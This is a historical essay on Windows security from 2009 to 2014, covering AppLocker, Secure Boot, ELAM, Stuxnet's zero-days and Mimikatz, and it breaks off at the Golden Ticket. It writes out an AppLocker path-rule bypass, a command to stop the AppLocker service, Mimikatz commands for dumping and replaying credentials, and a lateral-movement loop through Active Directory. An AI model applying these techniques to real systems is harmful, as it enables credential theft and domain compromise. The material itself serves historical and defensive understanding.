**2009-2014 was Windows security's parallel-revolution decade.** Microsoft shipped AppLocker, Secure Boot, ELAM, AppContainer, and in-box Defender [@ms-applocker; @ms-secure-boot; @ms-elam], retiring the rootkit class and the unsigned-bootloader class. In the same window, Stuxnet burned four Windows zero-days [@symantec-stuxnet-dossier-v14] against Iranian centrifuges and Benjamin Delpy released Mimikatz, which extracted every cached credential from LSASS in one command [@mimikatz-github; @greenberg-mimikatz-wired]. The defensive playbook closed per-binary attack surface while attackers pivoted up the trust stack to the credential layer that hardened binaries still had to trust. By November 11, 2014, Microsoft had acknowledged in product (Restricted Admin RDP, LSA Protected Process, KB2871997's WDigest opt-out) [@kb2871997; @ms-lsa-protection] and in print (the Mitigating Pass-the-Hash whitepaper v1 December 2012 and v2 July 2014) [@ms-pth-v1-landing; @ms-pth-v2] that the in-VTL0 LSASS model was structurally indefensible against an admin-privileged attacker on the same host. The architectural answer -- Virtualisation-Based Security and Credential Guard in Windows 10 1507 [@ms-credential-guard] -- ships eight months outside the window and opens Part 4.

1. Two Continents, Eleven Months Apart

Prerequisites. This article assumes the reader has the pre-2009 Windows-security context covered by Part 1 and Part 2, a working mental model of the Windows process / token / privilege-ring architecture (LSASS, NTLM, Kerberos AS-REQ/TGS-REQ, NTFS DACLs, EPROCESS internals, PCRs, SLAT, VTL0/VTL1), and familiarity with MS-NLMP section 3.3.2 NTLMv2 if you have not seen the construction before [@ms-nlmp-ntlmv2]. The graduate-seminar baseline is Windows Internals 6e Parts 1 and 2 [@windows-internals-6e-p1; @windows-internals-6e-p2].

June 17, 2010. An antivirus analyst at VirusBlokAda in Minsk named Sergey Ulasen receives a sample from an Iranian customer whose Windows boxes are rebooting on their own [@zetter-countdown-to-zero-day]. The dropper carries valid Authenticode signatures from Realtek Semiconductor and JMicron Technology [@symantec-stuxnet-dossier-v14]. The worm propagates via a previously unknown LNK shortcut bug that fires when Windows merely displays the icon of a crafted file [@ms-bulletin-ms10-046]. Eleven months later, in May 2011, a French government IT engineer named Benjamin Delpy publishes a closed-source proof-of-concept called Mimikatz that pulls NT hashes and Kerberos tickets out of the LSASS process memory of every Windows box he has ever logged into and prints them to the operator's console in one command [@greenberg-mimikatz-wired; @wikipedia-mimikatz]. The conventional history puts these two events on different pages of different books. This article argues they are the two visible faces of a single structural shift.

The shift is easy to state and easy to underrate. Defensive success at one layer reliably produces attacker innovation at the next layer up. Microsoft spent the 2009-2014 window shipping the most ambitious per-binary hardening programme of any commercial operating system in history -- AppLocker, ASLR improvements, BitLocker To Go, UEFI Secure Boot, Measured Boot, Early Launch Antimalware, AppContainer, the WinRT sandbox, and in-box Windows Defender [@ms-applocker; @ms-secure-boot; @ms-elam; @windows-internals-6e-p1]. The programme worked. It killed the unsigned-bootloader rootkit class, the pre-antivirus-launch malware class, and the in-process Internet Explorer rendering pwnage class. None of those primitives stopped Stuxnet on a Windows 7 host with USB enabled, and none of them stopped Mimikatz on any host where an administrator opened a console.

The reason is structural, not engineering. Every per-binary mitigation prevents the wrong code from running. Stuxnet's win32k.sys kernel exploit and Mimikatz's sekurlsa::logonpasswords command did not need to be wrong code. They needed to be the right code -- code an administrator chose to run, or a signed driver Microsoft itself had allowed to load -- running where the credentials lived. The credentials lived in the memory of a long-lived user-mode service called LSASS, and they lived there by design because the single sign-on contract requires the operating system to re-authenticate the user to network servers without re-prompting [@ms-credentials-processes]. The mitigation surface and the attack surface were not at the same layer.

timeline title 2009-2014 Windows Security Split Screen section Defender Oct 22 2009 : Windows 7 GA: AppLocker, ASLR improvements, BitLocker To Go Oct 26 2012 : Windows 8 GA: Secure Boot, ELAM, AppContainer, in-box Defender Oct 17 2013 : Windows 8.1: Restricted Admin RDP, LSA Protected Process May 13 2014 : KB2871997: WDigest opt-out, Restricted Admin back-port Nov 11 2014 : MS14-066 Schannel patch closes the window section Attacker Jan 12 2010 : Operation Aurora disclosed (single IE 0-day, espionage) Jun 17 2010 : VirusBlokAda identifies Stuxnet from an Iranian customer sample Dec 27 2010 : Dang and Ferrie present Stuxnet analysis at 27C3 Berlin May 2011 : Delpy releases Mimikatz (closed source) Aug 1 2013 : Duckwall and Campbell BlackHat USA Pass-the-Hash 2 Apr 6 2014 : Mimikatz GitHub repository created Aug 7 2014 : Delpy and Duckwall BlackHat USA Golden Ticket reveal

If both events were faces of the same shift, what was the shift? To see it, we have to start with what Microsoft was actually shipping.

2. The Hardening Decade: What Microsoft Was Doing 2009-2014

The popular story of 2009-2014 is that Microsoft was asleep while the Russians ate their lunch. That story is wrong. Microsoft shipped, in a single five-year window, more new platform-security primitives than the company had shipped in the previous decade combined. The problem was not the engineering. The problem was that the entire programme was orthogonal to the credential layer.

2.1 Windows 7 (October 22, 2009): per-binary control, finally

Windows 7 was the first Microsoft client operating system shipped after the Trustworthy Computing memo had finished one full Secure Development Lifecycle revolution. The headline platform addition was AppLocker, an application-control framework that let administrators allow or deny executables, scripts, MSI installers, DLLs, and packaged apps by publisher, file hash, or path [@ms-applocker]. Rules were authored in Group Policy and enforced by the Application Identity service. The rule-collection design was the first time a Microsoft Windows shipped a coherent allowlisting story rather than a bag of registry knobs.

AppLocker carried two structural gaps that took years to live down. First, the DLL rule collection was off by default. Enabling it broke application compatibility on almost every real estate. Second, the Application Identity service ran as a normal Windows service, which meant an attacker who reached LocalSystem could sc stop AppIDSvc and degrade enforcement open until the next reboot.This admin-stoppable-service gap is the design lesson that becomes the brief for Windows Defender Application Control's kernel-enforced policy model in Part 4 of this series. A third structural gap matters for the credential-theft era this article documents. AppLocker's publisher- and path-rule design decisions assume the file-system DACL stack enforces a clean read-allow / write-deny split for low-privileged users [@ms-applocker-design]. It does not.

The well-known operator bypass on a default Windows 7 install proceeds in four steps. Step one: identify a directory whose path matches the AppLocker default %WINDIR%\* allow rule for non-administrators (%WINDIR%\Tasks is the canonical example because it ships with permissive ACLs to let the Task Scheduler service write child files). Step two: drop the unsigned payload binary into that directory. Step three: invoke the binary by full path. Step four: observe that AppLocker's path-rule engine consults the configured policy rather than the file's actual DACL stack and permits execution because the parent directory matches the allow-rule glob. The bypass exists because AppLocker's rule evaluation and NTFS's DACL stack live on two independent rails that disagree about which paths a non-administrator may write; the cleanup that closes this class of bypass landed in Windows Defender Application Control, which is the Part 4 story.

AppLocker killed the per-binary "double-click an unsigned EXE on a managed desktop" attack class on every estate that deployed it, which turned out to be a strikingly small fraction of the Fortune 500.

Windows 7 also tightened the in-process mitigation surface. Address Space Layout Randomisation got a new opt-in ForceASLR flag callable via the loader's MitigationOptions field, letting administrators force randomisation even on EXEs and DLLs that had been compiled without the /DYNAMICBASE linker switch [@windows-internals-6e-p1].

BitLocker To Go for removable media finally gave administrators a defensible answer to the lost-USB-stick incident report. The on-disk format is a Full Volume Encryption v2 (FVE2) volume encrypted with plain AES-CBC; unlike fixed-disk BitLocker on Vista and original-release Windows 7, BitLocker To Go disables the Elephant Diffuser on removable drives so the small unencrypted discovery volume at the start of the device can ship BitLockerToGo.exe, the Windows XP / Vista BitLocker To Go Reader that supports plain AES-CBC only [@ms-bitlocker-configure]. The Reader unlocks the volume with a password or a recovery key (the recovery key escrowable by Group Policy to Active Directory); smart-card and automatic-unlock protectors require native BitLocker on Windows 7 or later. The discovery-volume design is the operational concession that lets a 2009 administrator hand a BitLocker-To-Go stick to a vendor running Windows XP SP3 without giving the vendor a usable plaintext copy; the diffuser drop is the cryptographic concession that makes the Reader compatibility story possible. The threat-model concession that BitLocker To Go does not cover is the unattended-laptop / cold-boot attack class against the primary disk's TPM-released VMK [@ms-bitlocker-countermeasures], which is the Evil-Maid territory Joanna Rutkowska and Alex Tereshkin demonstrated against TrueCrypt full-disk encryption in October 2009 [@rutkowska-evil-maid-2009] and which BitLocker would not fully answer until pre-boot PIN enforcement matured.

DirectAccess shipped as an always-on, certificate-anchored, IPsec-over-IPv6 tunnelled successor to traditional VPNs. The architectural design used a dual-tunnel model [@ms-directaccess-design-guide]: an infrastructure tunnel established at machine boot using a machine certificate, which gave the client reach-back to domain controllers, DNS, and management infrastructure before any user had logged on; and an intranet tunnel established at user logon using user credentials, which carried application traffic to the internal corporate network.

Because DirectAccess required end-to-end IPv6 in an era when public IPv6 was a rounding error, the design layered three transition technologies in priority order: 6to4 (for clients with a public IPv4 address), Teredo (for clients behind NAT), and IP-HTTPS (a TLS-encapsulated IPv6 transport that worked across any environment that allowed outbound HTTPS, included specifically as the fallback for hotel and conference networks that blocked native IPv6 and UDP-Teredo). The always-on-before-logon property is what made DirectAccess operationally distinct from a traditional VPN: a help-desk-recoverable password reset, a Group Policy push, or a software-distribution job could reach a remote machine the instant it had Internet connectivity, with no user action required.DirectAccess was later quietly deprecated in favour of Always On VPN and Microsoft Tunnel; the architectural lesson it carries is that certificate-anchored client trust scales operationally only when the certificate lifecycle is automated end-to-end.

What this killed: the per-binary "unsigned EXE on a managed desktop" class. What it did not touch: anything inside an LSASS-holding process tree.

2.2 Windows 8 (October 26, 2012): the boot chain and the sandbox

Windows 8 is the year the per-binary playbook reached architectural maturity. Four primitives shipped at once, and they all aim at distinct points on the trust stack.

UEFI Secure Boot anchors the boot chain in firmware. The Platform Key, signed Key Exchange Keys, and the signature database db together require the firmware to verify the signature of every UEFI driver, every option ROM, and the operating-system loader before transferring control [@ms-secure-boot; @ms-bulletin-ms10-046]. A revocation database dbx lets Microsoft retire keys and binaries that have been compromised. Windows 8 was the first Microsoft client operating system whose Logo certification required Secure Boot enablement by default; the chain is anchored to the UEFI 2.3.1 Errata C specification (June 2012).

Measured Boot complements Secure Boot. Each stage of the boot chain extends a SHA-256 measurement into Platform Configuration Registers 0 through 7 of the Trusted Platform Module, and the TPM event log records what was measured [@windows-internals-6e-p1]. BitLocker can then bind its Volume Master Key release to a specific PCR profile, so a tampered bootloader will not yield the disk key on next boot. Secure Boot decides whether the code is allowed to run; Measured Boot decides whether to release secrets to the code that ran.

Early Launch Antimalware (ELAM) is the first boot-start driver loaded after the kernel. ELAM gets to inspect, classify, and refuse subsequent boot-start drivers via the BDCB_CLASSIFICATION enumeration, which returns Good, Bad, Unknown, or BadButCritical [@ms-elam].Microsoft's own ELAM driver, WdBoot.sys, ships with Windows Defender; third-party antivirus vendors such as McAfee, Symantec, CrowdStrike, and SentinelOne ship their own ELAM drivers post-2014. ELAM services themselves run as a Protected Process Light, which prevents lower-signer-level code from injecting into the antimalware engine. ELAM killed the rootkit-loaded-before-AV class that had defined kernel-mode malware tradecraft since the early 2000s.

AppContainer introduces the LowBox access token. Each Modern (Metro) Windows Runtime app receives a token with a per-package security identifier and a vector of capability SIDs; resource access checks intersect the capability set with the resource's discretionary access control list [@windows-internals-6e-p1]. The model is structurally similar to iOS entitlements: the kernel refuses any access the manifest did not declare. Windows 8 also ships the in-box Windows Defender (replacing the optional Microsoft Security Essentials), and Internet Explorer 10 runs Enhanced Protected Mode inside an AppContainer, killing the in-process IE-rendering pwnage class that had dominated browser-borne malware for a decade.

A word on branding discipline. Windows 8's sandbox is correctly named WinRT plus AppContainer plus Modern (Metro) apps. UWP (Universal Windows Platform) is the Windows 10 brand introduced July 29, 2015; calling any Windows 8 deliverable UWP is a category error.

What this killed: unsigned-bootloader rootkits (Secure Boot), pre-AV-launch malware (ELAM), in-process IE-rendering pwnage (AppContainer plus Enhanced Protected Mode). What it did not touch: LSASS.

2.3 Windows 8.1 and Server 2012 R2 (October 17, 2013): the first counter-pivot

Windows 8.1 is where Microsoft first lands product-level controls that directly answer credential-replay tradecraft.

Restricted Admin RDP changes the protocol so that the client never sends the user's plaintext password to the server's LSASS [@kb2871997]. Instead, the server issues a network challenge that the client signs with its local NT hash. The classic credential-disclosure-at-server failure mode (a foothold on the RDP server learns every administrator's plaintext password as they log in) is closed. The replay failure mode is not, but Section 6 evaluates that honestly.

LSA Protected Process loads the LSASS process as a Protected Process Light with the signer level PsProtectedSignerLsa. Once Protected, even a process running as NT AUTHORITY\SYSTEM cannot call OpenProcess(PROCESS_VM_READ) against LSASS [@ms-lsa-protection]. The flag is enabled by setting HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL to 1. The architectural intuition is right; the bypass class lives in kernel mode and gets evaluated in Section 6.

Note: Restricted Admin RDP and LSA Protected Process are the first product-level Microsoft acknowledgements that the credential layer needed its own defensive rail, distinct from the per-binary playbook. Together they foreshadow the architectural pivot that ships in Windows 10 1507 as Virtualisation-Based Security and Credential Guard [@ms-credential-guard]. The full evaluation of both controls -- what they accomplish, what they leave open, and why -- is the subject of Section 6.

Every primitive above stops the wrong code from running. The threat model is about to move on.

3. Stuxnet: The Nation-State Zero-Day Reveal

3.1 Discovery timeline

Sergey Ulasen's June 17, 2010 sample at VirusBlokAda is the public discovery date [@zetter-countdown-to-zero-day]. The worm had been operating in the wild since at least 2009. Within weeks, Kaspersky, Symantec, and ESET independently confirmed the family. By September 2010, Ralph Langner at Langner Communications had identified the payload's specific target: Siemens Step 7 industrial-control software running on S7-300 programmable logic controllers, programmed to manipulate the rotor speeds of cascade-mounted gas centrifuges at the Natanz uranium enrichment facility in Iran [@langner-to-kill-a-centrifuge].

On December 27, 2010, Bruce Dang of Microsoft's Security Response Center and Peter Ferrie co-presented "Adventures in Analyzing Stuxnet" at the 27th Chaos Communication Congress (27C3) in Berlin [@dang-ferrie-27c3].The venue is 27C3, not 29C3, and Dang's affiliation is Microsoft MSRC, not Symantec; the talk is the canonical engineering primary for the win32k.sys keyboard-layout kernel exploit. Their first-hand engineering walkthrough of the win32k.sys keyboard-layout exploit is the canonical record of how Stuxnet escalated privilege on Windows 2000 and XP systems (on Windows Vista and 7, Stuxnet used the Task Scheduler zero-day CVE-2010-3338 instead). In February 2011, Nicolas Falliere, Liam O Murchu, and Eric Chien of Symantec Security Response published the v1.4 W32.Stuxnet Dossier, which enumerated the four Windows zero-days, the two stolen Authenticode certificates, and the Step 7 / S7-300 payload [@symantec-stuxnet-dossier-v14]. Ralph Langner's November 2013 "To Kill a Centrifuge" closed the analytical loop by identifying not one but two distinct centrifuge-attacks bundled into the same worm: an earlier rotor-overpressure attack and the later rotor-speed manipulation attack [@langner-to-kill-a-centrifuge].

3.2 The four zero-days

The Symantec dossier's accounting of Stuxnet's Windows zero-days is the canonical inventory. There were four, used across the worm's propagation and escalation surfaces, not chained in a single sequential exploit.

Bulletin	CVE	Role in the worm	Patch date
MS10-046	CVE-2010-2568	LNK shortcut RCE; propagation via USB without autorun [@ms-bulletin-ms10-046]	August 2, 2010
MS10-061	CVE-2010-2729	Print Spooler RCE; network-layer propagation [@ms-bulletin-ms10-061]	September 14, 2010
MS10-073	CVE-2010-2743	win32k.sys keyboard-layout local privilege escalation [@ms-bulletin-ms10-073]	October 12, 2010
MS10-092	CVE-2010-3338	Task Scheduler local privilege escalation [@ms-bulletin-ms10-092]	December 14, 2010

The LNK bug (MS10-046) is the propagation-by-USB primitive that gave Stuxnet its air-gap-jumping reputation: merely displaying the icon of a crafted shortcut, which Windows Explorer did automatically when the user opened the USB drive, triggered code execution [@ms-bulletin-ms10-046]. The Print Spooler RCE (MS10-061) addressed a Spooler permissions-validation bug that let Stuxnet propagate over the network as a printer-share request [@ms-bulletin-ms10-061].The Print Spooler attack surface returned a decade later as CVE-2021-34527 PrintNightmare, demonstrating that a sufficiently complex local-privilege-escalation surface tends to be re-discoverable across architectural rewrites. The keyboard-layout LPE (MS10-073) was the one Dang and Ferrie walked at 27C3 -- the kernel indexed a table of function pointers when loading a keyboard layout from disk, and Stuxnet supplied a layout that pointed the index at attacker memory [@ms-bulletin-ms10-073]. The Task Scheduler LPE (MS10-092) corrected the way Task Scheduler conducted integrity checks to validate that tasks ran with their intended user privileges [@ms-bulletin-ms10-092]. Stuxnet also re-used the older MS08-067 NetAPI worm bug on unpatched hosts as a non-zero-day propagation path [@ms-bulletin-ms08-067] -- this is the Conficker bug from October 2008, not a 2010 zero-day, and any four-zero-day count that includes it is wrong.

flowchart LR subgraph Propagation A["LNK shortcut RCE
MS10-046 / CVE-2010-2568"] B["Print Spooler RCE
MS10-061 / CVE-2010-2729"] end subgraph Escalation C["win32k.sys keyboard-layout LPE
MS10-073 / CVE-2010-2743"] D["Task Scheduler LPE
MS10-092 / CVE-2010-3338"] end subgraph Payload E["Siemens Step 7 / S7-300 PLC
centrifuge rotor manipulation"] end A --> C A --> D B --> C B --> D C --> E D --> E

3.3 The stolen Authenticode certificates

The worm's dropper was signed by two real, valid Authenticode certificates issued to Realtek Semiconductor and JMicron Technology [@symantec-stuxnet-dossier-v14]. Both certificates were revoked within weeks of disclosure, but during the operational window of Stuxnet, every signature check Windows performed against the dropper returned a clean verdict.The Realtek and JMicron certificates were not merely stolen out of an email inbox; the corresponding hardware security modules were almost certainly accessed in person at the original equipment manufacturers' facilities in the Hsinchu Science Park, Taiwan -- the long-form reconstruction in Kim Zetter's Countdown to Zero Day lays out the physical-access logistics that the wire-only theft hypothesis cannot satisfy [@zetter-countdown-to-zero-day]. This prefigured the supply-chain attack class that becomes SolarWinds a decade later. This was the first publicly analyzed kinetic-effect proof that the code-signing trust root -- Authenticode and the kernel-mode driver signing PKI that depended on it -- was an adversary target rather than a structural defence.

3.4 Architectural lessons

Two structural lessons emerged from the disclosure cycle. First, USB as an attack surface acquired its own discipline. In February 2011, Microsoft re-released the autorun update covered by Microsoft Security Advisory 967940 / KB971029 as an automatic update via Windows Update, having previously offered it as an optional patch in February 2009 [@krebs-autorun-2011]. Second, IT and operational-technology (OT) cross-domain trust collapsed as a defensible perimeter -- Natanz was an air-gapped network that a USB stick crossed, and every CISO with operational-technology assets had to re-ask the question of whether a nation-state would burn a Windows zero-day to break their plant.

3.5 Did Stuxnet defeat any defender primitive Windows 7 shipped?

The narrow answer is no, the worm did not need to. Stuxnet's propagation primitives carried their own attack code -- the LNK bug ran from Explorer, the Spooler bug ran from the printer-share RPC interface -- so they did not need to defeat AppLocker (AppLocker only blocks executions a configured rule denies; an explorer.exe rendering a crafted shortcut was not a denied execution) or ASLR or DEP. The win32k.sys local privilege escalation, however, foreshadowed the Section 5 argument neatly: the per-binary mitigations Windows 7 shipped (AppLocker, ASLR, DEP, ForceASLR) did nothing for a kernel-mode bug, because kernel-mode is where those mitigations are enforced from.

3.6 Was Stuxnet really the first nation-state Windows zero-day operation?

Only with two qualifiers. Operation Aurora -- the espionage campaign Google publicly disclosed on January 12, 2010 [@google-aurora-blog; @google-aurora-wayback] -- pre-dates Stuxnet's June 2010 public identification by roughly five months and used a single Windows / Internet Explorer zero-day, the IE use-after-free catalogued as CVE-2010-0249 [@nvd-cve-2010-0249], for cyber-espionage. Google's own disclosure stated that "at least twenty other large companies from a wide range of businesses -- including the Internet, finance, technology, media and chemical sectors -- have been similarly targeted" [@google-aurora-wayback]. The publicly named subset that emerged across the January 12-15, 2010 disclosure window included Adobe Systems (acknowledged on the Adobe corporate blog January 12, 2010) [@adobe-aurora-disclosure], Juniper Networks, Rackspace [@wikipedia-operation-aurora], plus Yahoo, Symantec, Northrop Grumman, Dow Chemical, and Morgan Stanley named in Ariana Eunjung Cha and Ellen Nakashima's Washington Post coverage on January 14, 2010 [@wapo-aurora-cha-nakashima]. Dmitri Alperovitch of McAfee Labs named the campaign "Operation Aurora" on January 14, 2010 based on a \..\Aurora_Src\AuroraVNC\ file-path string recovered from the malware binaries [@mcafee-aurora-alperovitch]. Microsoft patched the IE bug out-of-band as MS10-002 on January 21, 2010 [@ms-bulletin-ms10-002].

Aurora is the necessary disambiguation. The popular framing of Stuxnet as the first nation-state Windows zero-day operation is *false* without qualifiers. Aurora used one zero-day for espionage in January 2010; Stuxnet used four zero-days for kinetic effect in June 2010. The defensible framing is: *Stuxnet is the first publicly analyzed nation-state Windows operation that burned multiple zero-days for kinetic, physical effect* [@symantec-stuxnet-dossier-v14; @google-aurora-blog; @nvd-cve-2010-0249]. Both qualifiers ("multi-zero-day" and "kinetic / physical") are load-bearing. Drop either and Aurora falsifies the framing.

Stuxnet showed nation-states would burn four Windows zero-days for a single operation. But four zero-days is an expensive way to compromise a credential, and as it turned out, a French engineer was about to make zero-days irrelevant for the credential-theft problem.

4. Mimikatz: The Credential Layer Demolition

Benjamin Delpy describes Mimikatz, in Andy Greenberg's Wired profile, as "a side project to learn C" [@greenberg-mimikatz-wired]. The reader's natural reaction -- a side project that broke a decade of Microsoft's most ambitious hardening programme? -- is precisely the point.

4.1 Delpy, LSASS, and the May 2011 release

Delpy was at the time an IT manager at a French government institution he declines to name [@greenberg-mimikatz-wired]. He had become curious about an architectural quirk: Windows could prompt for his password at logon, then later authenticate him to remote servers (IIS via HTTP Digest, SMB via NTLM or Kerberos) without ever asking again. Something inside the OS had to hold a recoverable form of his password. He started reverse-engineering the Local Security Authority Subsystem Service (LSASS) and the authentication packages and security support providers loaded into it.

A long-lived user-mode Windows process that holds the secrets the operating system needs to satisfy single sign-on across SMB, RPC, HTTP, RDP, IIS, and MS-SQL without re-prompting the user. By design, LSASS caches NT hashes, Kerberos Ticket-Granting Tickets, and (depending on the loaded security packages) recoverable plaintext credentials [@ms-credentials-processes]. It is the load-bearing target of every credential-extraction tool the next decade produces.

The architectural quirk was structural, not accidental. The single sign-on contract requires the operating system to re-authenticate the user to network services, and the network protocols of the 1990s and 2000s (NTLM, Kerberos, HTTP Digest, MS-CHAP) all required either a hash, a ticket, or a recoverable plaintext to do that re-authentication [@ms-credentials-processes]. LSASS held all three. There was no way to satisfy the contract without holding the secret in some recoverable form inside an LSASS-controlled memory region.

Delpy released the first version of Mimikatz in May 2011 as closed-source software [@greenberg-mimikatz-wired; @wikipedia-mimikatz].Delpy describes Mimikatz as "a side project to learn C" in the Wired profile; the framing matters because it underlines that breaking Windows credential security at this depth did not require nation-state resources -- a single engineer with a debugger could do it. Microsoft's response to his initial private disclosure had been, in his telling, that "you don't want to fix it"; he made the tool public to force the conversation. The GitHub repository gentilkiwi/mimikatz was created on April 6, 2014 at 18:30:02 UTC -- the API-verifiable timestamp [@mimikatz-github]. Any "Mimikatz first released in 2007" claim refers to Delpy's pre-release private experimentation, not a public release.

4.2 Four primitives that broke the credential layer

The Mimikatz module set Delpy authored over 2011-2014 contains four primitives that together explain why every per-binary mitigation Microsoft had shipped was insufficient.

Replay an NT hash as a bearer credential against any service that accepts NTLM authentication, *without* ever knowing the user's plaintext password [@mimikatz-github; @duckwall-campbell-bh2013]. The NTLM protocol authenticates by proof-of-possession of the NT hash, not proof-of-knowledge of the password.

Pass-the-Hash is the load-bearing primitive. NTLM authentication on the wire authenticates by proof-of-possession of the NT hash, not proof-of-knowledge of the password. The plaintext password is computed exactly once, at logon, to derive the NT hash via MD4(UTF16LE(password)). After that the operating system does not need the cleartext again for NTLM. Anyone holding the hash can authenticate as the user without ever knowing the password. The real NTLMv2 protocol per MS-NLMP §3.3.2 is a two-stage HMAC-MD5 construction [@ms-nlmp-ntlmv2]: stage 1 derives an intermediate NTOWFv2 = HMAC_MD5(NT_hash, UTF16LE(UPPERCASE(user) || domain)); stage 2 computes NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || ClientChallengeBlob). The bearer-credential invariant survives both stages -- the function consumes the NT hash directly and never references the cleartext -- which is the exact property Pass-the-Hash exploits.

{` // Illustrative -- the real NTLMv2 protocol is a two-stage HMAC-MD5 // construction (see MS-NLMP section 3.3.2): // Stage 1: NTOWFv2 = HMAC_MD5(NT_hash, UPPERCASE(user) || domain) // Stage 2: NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || temp) // The Pass-the-Hash invariant -- that the NT hash is the bearer // credential because the protocol consumes it without ever needing // the cleartext password -- survives the simplification below. const crypto = require('crypto');

function ntlmResponse(ntHash, serverNonce, clientNonce) { // Simplified single-stage HMAC-MD5 keyed on the NT hash. // The plaintext password is never used by the protocol after logon. const hmac = crypto.createHmac('md5', Buffer.from(ntHash, 'hex')); hmac.update(Buffer.concat([serverNonce, clientNonce])); return hmac.digest('hex'); }

const stolenHash = '8846f7eaee8fb117ad06bdd830b7586c'; const serverNonce = Buffer.from('0123456789abcdef', 'hex'); const clientNonce = Buffer.from('fedcba9876543210', 'hex');

console.log('NTLM response:', ntlmResponse(stolenHash, serverNonce, clientNonce)); console.log('No plaintext password was used. The hash IS the credential.'); `}

Note: The plaintext password is not the secret. Once the operating system has derived the hash at logon, anyone who reaches LSASS and reads that hash can authenticate as the user against any NTLM-accepting service for as long as that hash remains valid -- which is until the user next changes the password. The credential-replay class is a corollary of this single insight applied to different bearer credentials.

Extract a Kerberos Ticket-Granting Ticket or service ticket from LSASS and re-import it into another logon session for replay. Mimikatz exposes both halves: `sekurlsa::tickets /export` extracts; `kerberos::ptt` re-imports [@mimikatz-github].

Pass-the-Ticket is the Kerberos analogue of Pass-the-Hash. A Kerberos TGT is a bearer credential by design -- it proves the holder authenticated to the Key Distribution Center -- and like the NT hash, anyone holding the ticket can replay it. Mimikatz's kerberos::ptt injects a ticket blob into the local session's ticket cache; the next call to klist shows it as if the local logon had earned it.

Use a stolen NT hash to request a *fresh* Kerberos TGT from the Key Distribution Center -- the bridge from an NTLM-recovered hash to a Kerberos-issued ticket. Defeats estates that have disabled NTLM but trust Kerberos pre-authentication keys derived from the same password hash [@mimikatz-github].

Overpass-the-Hash is the bridge primitive. Estates that disabled NTLM in 2012-2014 in response to early Pass-the-Hash discussion believed they had closed the credential-replay door. Overpass-the-Hash re-opened it by using the NT hash directly as the RC4-HMAC Kerberos key to encrypt the pre-authentication timestamp, then sending a normal Kerberos AS-REQ. Where the KDC still accepted RC4, it issued a TGT keyed on the same secret the NTLM stack had used. From there, every subsequent Kerberos service ticket request was a legitimate Kerberos exchange backed by a stolen secret.

WDigest plaintext-in-memory is the fourth primitive, and the one that surprised even Microsoft's own teams when Delpy demonstrated it. Microsoft's WDigest Security Support Provider, which implemented HTTP Digest authentication on the server side and Digest single sign-on on the client side, held the user's plaintext password in LSASS memory by design, recoverable as long as the user's session was active.WDigest predates the modern web; HTTP Digest authentication had been essentially deprecated by the time Mimikatz operationalised the plaintext-recovery primitive, which is why the KB2871997 opt-out has near-zero operational downside on any post-2010 estate. Mimikatz's sekurlsa::logonpasswords enumerated the loaded authentication packages and security support providers, located their logon-session structures in LSASS memory, and printed every cached secret it could decrypt -- including, on most pre-2014 estates, the user's plaintext password in clear text.

(One discipline note. Skeleton Key is not one of the Part 3 Mimikatz primitives. Skeleton Key was disclosed by Dell SecureWorks Counter Threat Unit on January 12, 2015 [@secureworks-skeleton-key] and Delpy added misc::skeleton to Mimikatz on January 17, 2015, both outside the Part 3 window. It opens Part 4.)

sequenceDiagram participant Op as Operator (Admin) participant Mim as mimikatz.exe participant Krn as Windows Kernel participant LSA as LSASS.exe Op->>Mim: privilege::debug Mim->>Krn: AdjustTokenPrivileges (SeDebugPrivilege) Krn-->>Mim: TRUE Op->>Mim: sekurlsa::logonpasswords Mim->>Krn: OpenProcess (PROCESS_VM_READ on LSASS PID) Krn-->>Mim: process handle Mim->>LSA: ReadProcessMemory (walk security-package list) LSA-->>Mim: encrypted credential blobs Mim->>Krn: BCryptDecrypt (LSA master key from same address space) Krn-->>Mim: cleartext NT hashes, TGTs, WDigest plaintexts Mim-->>Op: print every cached secret

4.3 The 2013 inflection: graph-walking offensive Active Directory

In August 2013, Skip Duckwall and Chris Campbell delivered "Pass-the-Hash 2: The Admin's Revenge" at Black Hat USA [@duckwall-campbell-bh2013]. The talk did not invent the primitives Mimikatz had already shipped. It made offensive Active Directory tradecraft a public, named discipline by formalising the graph-walking insight: every Windows host an administrator logs into caches a credential for that administrator; every credential cached on a compromised host is a stolen credential; every stolen credential is a new starting node for the next lateral movement. The attack graph closes on the domain controller within hops measured in single digits on almost every real enterprise estate.

The discipline decomposes into a four-step iterative loop on any Windows estate with cached domain credentials [@duckwall-campbell-bh2013]. Step one: enumerate active sessions on the compromised host -- NetSessionEnum returns inbound SMB sessions, NetWkstaUserEnum returns the logged-on user list (pre-KB4480964 without admin rights), and quser / qwinsta enumerate interactive logons. The output is the (user, host) tuple set representing every credential cached in the host's LSASS. Step two: identify a reachable administrator -- cross-reference each enumerated user against local Administrators group membership and against the domain groups that grant administrative access to a higher-tier host. The output is a set of (harvested-user, target-host) tuples where the harvested credential can be replayed against the target with administrative privilege. Step three: Pass-the-Hash to the higher-tier host -- inject the harvested NT hash into a new logon session via sekurlsa::pth /run:... and execute remote commands against the target as the harvested user, with no need for the cleartext password [@mimikatz-github]. Step four: harvest the new host's LSASS and repeat -- sekurlsa::logonpasswords against the new beachhead dumps every credential that host has cached, each becoming a new starting node for the next iteration. The loop terminates when one harvested credential is a Domain Admin.

This four-step loop is the implicit graph the article's diagram illustrates: vertices are users and hosts, edges are MemberOf (user is a group member), AdminTo (user has administrative access to a host), and HasSession (a host currently caches a credential for a user). Three years later, Andy Robbins, Will Schroeder, and Rohan Vazarkar productized this graph at DEF CON 24 in Las Vegas on August 6, 2016 as BloodHound, which uses the SharpHound collector to enumerate every vertex and edge, loads them into a Neo4j database, and runs Cypher shortest-path queries from any compromised principal to the Domain Admins group [@bloodhound-defcon24]. BloodHound is a 2016 artifact and properly belongs to Part 4; for the 2009-2014 Part 3 window, the graph existed only in operator notebooks and on Duckwall and Campbell's whiteboard, but every Windows estate already had it -- the attacker just had to walk it.

4.4 The 2014 inflection: the Golden Ticket

In August 2014, Benjamin Delpy and Skip Duckwall jointly presented "Abusing Microsoft Kerberos: Sorry You Guys Don't Get It" at Black Hat USA [@delpy-duckwall-bh2014].The dual authorship matters: Delpy and Duckwall presented the talk together, and any single-author attribution misses the collaboration that produced the Golden Ticket walkthrough. The headline reveal was the Golden Ticket: a forged Kerberos Ticket-Granting Ticket signed with the domain's stolen krbtgt key (classically the NT hash, which is the RC4-HMAC key, or the krbtgt AES keys on AES-enabled domains).

